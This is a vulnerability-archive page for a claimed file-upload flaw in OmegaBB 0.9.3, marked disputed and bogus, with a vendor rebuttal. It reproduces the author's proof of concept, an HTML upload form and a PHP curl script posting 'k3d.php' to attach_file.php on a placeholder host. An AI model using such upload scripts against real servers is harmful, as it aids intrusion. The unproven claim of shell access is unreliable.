Disputed / BOGUS

OmegaBB v0.9.3 <= (XSRF) File Upload Vulnerability

Published / (Updated)
Credit
Risk
2013-08-06 / 2013-08-10
KedAns-Dz
Low
CWE
CVE
Local
Remote
CWE-352
CWE-264
N/A
No
Yes

=VENDOR COMMENT=======
The alert claims it can upload a code-injected file and gain shell access to the server. If you read the alert carefully you'll see he has failed to demonstrate this. This is impossible for several reasons:

Firstly only file types you configure are allowed to be uploaded, a heuristics routine is ran to confirm it's an allowed file type. However this is insufficient as file heuristics can be spoofed. The true line of defence is how uploaded files are stored and rendered. Uploaded files are sandboxed in a directory which no one has access to (.htaccess), they are stripped of their filename and replaced with a hash number and loses UNIX permissions. When a client requests a file it passes through the file.php wrapper which reads and delivers the file as octet-stream. Should a file be uploaded with injected code it doesn't matter, since the file is never accessed directly.
========

# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : 1337day.com 0
# 1 [+] Support e-mail : submit[at]1337day.com 1
# 0 0
# 1 ######################################### 1
# 0 I'm KedAns-Dz member from Inj3ct0r Team 1
# 1 ######################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : OmegaBB v0.9.3 <= (XSRF) File Upload Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.owasp-dz.org | owasp-dz.org/forum
# Type : php - proof of concept - webapp 0day - remote
# Tested on : Windows7 (Fr)
# Vendor : [http://www.omegabb.com]
###

# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !

######## [ Proof / Exploit ] ################|=>

# Download : http://www.omegabb.com/omegabb-0.9.3.tar.gz

# p.0.c : /[PATH]/attach_file.php << upload file ( use temper data - or - the php/html exploit)

##>>> After creat new user/member u can upload attach's with this uploader

# dEmo : http://www.omegabb.com/demo/attach_file.php

####

<html>
<body>
<form name="iform" action="http://[HOST]/[PATH]/attach_file.php" method="post" enctype="multipart/form-data">
<input id="file" type="file" name="file" onchange="upload(); " />
<input type="hidden" name="imgnum" />
<input type="submit" value="Upload" title="Upload" />
</form></body>
</html>

####

<?php
$uploadfile="k3d.php";
$ch = curl_init("http://[HOST]/[PATH]/attach_file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# File Dir/Path is [/files/tmp/] ' but the uploader renamed the file to some Hash! ' :p

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]==================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#================

References:

http://www.omegabb.com/omegabb-0.9.3.tar.gz


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com